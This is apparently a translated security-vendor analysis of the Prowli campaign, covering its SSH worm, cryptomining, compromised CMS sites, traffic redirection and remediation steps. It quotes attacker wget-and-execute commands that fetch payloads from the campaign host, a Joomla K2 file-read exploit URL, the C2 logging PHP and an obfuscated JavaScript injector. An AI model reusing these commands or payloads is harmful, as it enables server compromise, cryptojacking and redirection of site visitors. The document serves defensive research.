多目標的攻擊活動——Prowli的技術分析

Operation Prowli通過向伺服器和網站發送惡意軟體進行傳播，已經入侵了超過4萬台設備。Prowli會使用不同的攻擊技術包括漏洞利用、密碼暴力破解和弱配置等。

Prowli是一個多目標的攻擊活動，攻擊目標涉及多個平台包括CMS伺服器，運行HP Data Protector的備份伺服器，DSL數據機和IoT設備。攻擊者通過數字貨幣、流量重定向等方式進行獲利。

本報告主要關注攻擊技術、方法、基礎設施和目標。隨後將深入分析技術細節和攻擊者的獲利方式。

r2r2蠕蟲

4月4日，GuardiCore Global Sensor Network (GGSN)報告了與C2伺服器通信的SSH攻擊。所有的攻擊方式是一樣的，與相同的C2伺服器下載叫做r2r2的攻擊工具和一個加密貨幣挖礦機。

GGSN報告的攻擊步驟

·研究人員發現該攻擊活動攻擊了不同國家的數個網路，涉及不同的行業；

·攻擊者使用了一些新的攻擊來繞過Guardicore和VirusTotal的檢測；

·攻擊者使用代碼中硬編碼了域名的二進位文件，每個二進位文件都針對不同的攻擊服務和CPU架構。

過去3周內，研究人員發現了來自不同國家和地區的超過180個IP地址發起的攻擊。研究人員通過這些攻擊調查了攻擊者的基礎設施並發現了大範圍的攻擊服務。

範圍

研究人員發現攻擊者保存了大量的攻擊目標的信息，包括提供不同internet服務的IP地址和域名等。這些服務易受到遠程預認證（remote pre-authentication attack）攻擊，或攻擊者可以進行暴力破解。攻擊者的攻擊目標服務列表包括Drupal CMS網站、Wordpress站點、DSL數據機、開放SSH埠的伺服器、有漏洞的IoT設備、暴露HP數據保護軟體的伺服器等等。

運行弱SSH憑證的受害者

Prowli背後的運營者會攻擊所有類型和大小的組織，這與之前的攻擊一致的。

Operation Prowli的受害者

Operation Prowli入侵了大量的服務，而不是攻擊特定的單元。

受害者所屬行業

獲利方式

Operation Prowli背後的攻擊者更加關注如何從攻擊者獲利，研究人員分析出兩個主要的收入流：

第一個收入源是加密貨幣挖礦。加密貨幣挖礦需要投入大量的流量和能源消耗。攻擊者使用r2r2惡意軟體可以接管計算機並用來挖礦。加密貨幣挖礦也是當代蠕蟲的常見payload之一，本活動中的攻擊者選擇的是門羅幣Monero挖礦。

另一個收入源是流量欺騙獲利。流量獲利是指第三方用戶向攻擊者購買重定向服務。網站的運營者根據流量獲利，這類目的域名會經常駐留不同的欺騙服務，比如虛假服務、惡意瀏覽器擴展等。

被重定向到虛假網站訪問者示例

在本例中，Prowli售賣重定向到流量，訪問者會被重定向到提供技術支持（騙局）、虛假瀏覽器擴展、虛假產品等的域名。

攻擊目標

Prowli的運營者有許多的攻擊方法來滿足不同的攻擊需求。研究人員也發現了基於不同服務的攻擊類型，一些攻擊時基於蠕蟲的，會隨機攻擊網路上的IP地址,而其他的攻擊會攻擊CMS伺服器等。

研究人員發現的攻擊向量有：

·運行SSH的機器被自傳播的蠕蟲通過暴力破解憑證猜測的方式入侵，受害者隨後會下載和運行加密貨幣挖坑機。

·運行k2擴展到Joomla!伺服器，k2擴展存在文件下載漏洞，URL為http://.com/index.php?option=com_k2&view=media&task=connector&cmd=file&target=[base64 of file path]&download=1

攻擊者可以從中獲取敏感伺服器配置數據，如口令和API key等。

Joomla!配置細節

·DSL數據機被黑，該漏洞存在於SOAP數據處理中，會導致遠程代碼執行，該漏洞之前也被Mirai蠕蟲利用過。

·WordPress伺服器被一些感染器入侵，一些感染器嘗試暴力破解登錄WP管理面板，還有其他的WP安裝漏洞；還有利用伺服器配置問題的攻擊，比如在訪問站點 http://.com/wp-config.php~時會暴露FTP憑證信息。

·運行HP data protector的伺服器會通過5555埠暴露到網路上，利用的是CVE-2014-2623漏洞來執行系統許可權命令。

攻擊者還攻擊Drupal，PhpMyAdmin安裝，NFS盒子和暴露SMB埠的伺服器等。

還有一類受害者是被入侵的伺服器，伺服器上有著名的開源webshell叫做WSO web shell。

對被感染設備的完全控制

這些基於php的shell會在不同的被入侵的機器上提供訪問和遠程代碼執行許可權，經常會運行在有漏洞的wordpress站點上。

攻擊者很容易就可以將這些設備用於未來的攻擊中

針對win的暴力破解

名為r2r2的二進位文件是用Golang語言編寫的，r2r2會隨機地生成IP地址塊並嘗試用詞典暴力破解SSH登錄。一旦登錄，就會在受害者設備上運行一系列的命令。這些命令運行wget來從硬編碼的伺服器上下載文件：

·針對不同CPU架構的蠕蟲副本；

·加密貨幣挖礦機和配置文件。

蠕蟲在受害者設備上遠程執行命令，然後將憑證報告給C2伺服器

用到的命令為：

cd /tmp;wget -O r2r2 h[]://wp.startreceive.tk/tdest/z/r2r2;chmod 777 r2r2;./r2r2 > /dev/null 2>&1 &

cd /tmp;wget -O r2r2-a h[]://wp.startreceive.tk/test/z/r2r2-a;chmod 777 r2r2-a;./r2r2-a > /dev/null 2>&1 &

cd /tmp;wget -O r2r2-m h[]://wp.startreceive.tk/test/z/r2r2-m;chmod 777 r2r2-m;./r2r2-m > /dev/null 2>&1

cd /tmp;wget -O xm111 h[]://wp.startreceive.tk/test/z/xm111;chmod 777 xm111;wget -O config.json h[]://wp.startreceive.tk/test/z/config.json;chmod 777 config.json;./xm111 > /dev/null 2>&1

r2r2，r2r2-a，r2r2-m等不同版本的r2r2二進位文件其實是相同的二進位文件在不同平台編譯的結果。

從提取出二進位文件可以幫助對攻擊者進行命名

在攻破伺服器後，用來登錄受害者設備的憑證就會以明文HTTP的形式傳給wp.startreceive[.]tk/test/p.php ，然後保存到攻擊者伺服器中。蠕蟲的某些版本發送更多關於受害者的詳細信息，如CPU，內核dist版本等。

Joomla!.tk C&C

攻擊工具報告的C2伺服器運行的域名為wp.startreceive[.]tk，該伺服器也是個被入侵的伺服器，攻擊者將其用來存放惡意軟體、收集受害者信息，並向其他被入侵的機器提供不同的payload。

C2的邏輯上用一組php文件來接受來自受害者的數據並保存。攻擊者會保存如何利用受害者設備的所有信息，這樣就可以隨時獲取設備的訪問許可權。

攻擊者C2代碼段：

if ( isset ($_GET[『p』 ])) {

$myfile = file_put_contents( 『ip2_log.txt』 , $ip. 「||」 .$_GET[ 『p』 ].PHP_EOL , FILE_APPEND | LOCK_EX);

}

elseif ( isset ($_GET[『p1』])){

$myfile = file_put_contents( 『ip3_log.txt』 , $ip. 「||」 .$_GET[ 『p1』 ].PHP_EOL , FILE_APPEND | LOCK_EX);

}

else {

if ( isset ($_GET[ 『p2』 ])){

$myfile = file_put_contents( 『ip4_log.txt』 , $ip. 「||」 .$_GET[ 『p2』 ].PHP_EOL , FILE_APPEND | LOCK_EX);

}

}

if ( isset ($_GET[ 『t1』 ])) {

$myfile = file_put_contents( 『mhcl_log.txt』 , $ip.PHP_EOL , FILE_APPEND | LOCK_EX);

}

if ( isset ($_GET[ 『t2』 ])) {

$myfile = file_put_contents( 『dru_log.txt』 , $_GET[ 『t2』 ].PHP_EOL , FILE_APPEND | LOCK_EX);

}

payload

Prowli背後的攻擊者對不同的目標使用不同等payload。SSH暴力破解攻擊可以給攻擊者對於系統的完全控制來進行加密貨幣挖礦，而被入侵的網站可以用來運行不同的web欺騙活動。其他的受害者設備可以被用來執行更多的攻擊，比如用作C2伺服器。

該攻擊活動的一個重要部分就是感染運行了有漏洞的CMS軟體的網站。在一些攻擊實例中，payload是一個php文件，該文件可以感染網站並向不同的php頁面和js文件中注入惡意代碼。

在有漏洞的伺服器上執行的php文件

PHP注入器函數php_in會檢查目標PHP文件是否會輸出HTML文件，如果是，就注入一段JS代碼到生成的頁面中。這段代碼會開啟一個進程，並將訪問站點的用戶重定向到惡意的站點。

重定向腳本逆混淆前後

send.php頁面會提取目標域名，因為之後受害者也會被重定向到該頁面。roi777[.]com提供隨機選擇的域名，所有都會重定向到不同類型的不同站點。攻擊者會將id號加到目標域名，允許roi777記錄誰在重定向流量。

重定向垃圾郵件示例

總的來說，Prowli接管合法的網站，並在其所有者不知情的情況下將流量重定向到惡意網站，這些重定向到方式包括簡單的垃圾郵件、技術支持類垃圾郵件等。

檢測和預防

攻擊是基於已知的漏洞和憑證猜測的結合，也就是說預防的方式應該包含強密碼和保持軟體更新。給伺服器打補丁和使用強密碼在現實生活中都是很複雜的事，還有給系統上鎖等方式將有漏洞的系統和其他網路隔離開來。

對CMS軟體來說，如果不能及時打補丁，那麼可能隨時會被黑，還要遵循嚴格的加固指南，比如WordPress、 Drupal provide加固指南。

分段式另外一個好的實踐方式，如果不能防止系統被入侵，那麼將網路分段和監控，就是一個減少危害、避免數據泄漏的方式。要經常性地去檢查誰可以訪問伺服器，可以訪問伺服器的什麼內容。將此列表保持在最低限度，並且要特別注意那麼憑證不能修改的IoT設備。監控通信連接可以很容易的知道被黑的設備如何與加密貨幣礦池進行通信。

R2R2感染的設備

如果用戶設備感染了r2r2，那麼首先要殺掉蠕蟲和挖礦進程（r2r2和xm11），刪除文件來清除攻擊。清除後記得要修改密碼。用戶可以通過尋找佔用CPU比較高的進程和異常的SSH連接來檢測這些受感染的設備。

檢測感染Prowli的網站的訪問者

通過檢查網路中是否有到域名wp.startreceive[.]tk和stats.startreceive[.]tk的流量就可以發現網路中的設備是否訪問過被感染的網站。研究人員建議用戶確保未安裝惡意軟體或沒有常見的可被利用的瀏覽器漏洞。

檢測被黑的CMS伺服器

檢查網站是否被黑，最簡單的方式就是搜索有沒有下面的代碼段（PHP和js文件）:

JavaScript files:

eval(String.fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 122, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 122, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 115, 46, 115, 116, 97, 114, 116, 114, 101, 99, 101, 105, 118, 101, 46, 116, 107, 47, 115, 99, 114, 105, 112, 116, 46, 106, 115, 63, 100, 114, 61, 49, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 122, 41, 59));

PHP files:

如果你在系統或者網站上發現上面的代碼段，那麼你的網站可能已經被黑了。

結論

GuardiCore Labs研究人員對Prowli的獲利活動進行了分析，主要是通過加密貨幣挖礦和流量劫持。被入侵的不安全的機器會被安裝一個完全自動化的蠕蟲進行Monero挖礦，被感染的web站點會將訪問用戶重定向到惡意域名。

Prowli已經通過利用不安全的網站和伺服器入侵了上千台設備。互聯網上存在著大量未被修復的系統，未升級的系統和默認憑證都是攻擊的目標。

加密貨幣挖礦和流量劫持是被入侵設備的主要用途，但攻擊者的目的不至於此。攻擊者在受害者設備上留下了後門，並收集了受害者設備的信息，因此攻擊者可以很輕鬆的用受害者設備做其他用途，甚至可以將保存的信息賣給其他的犯罪分子。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！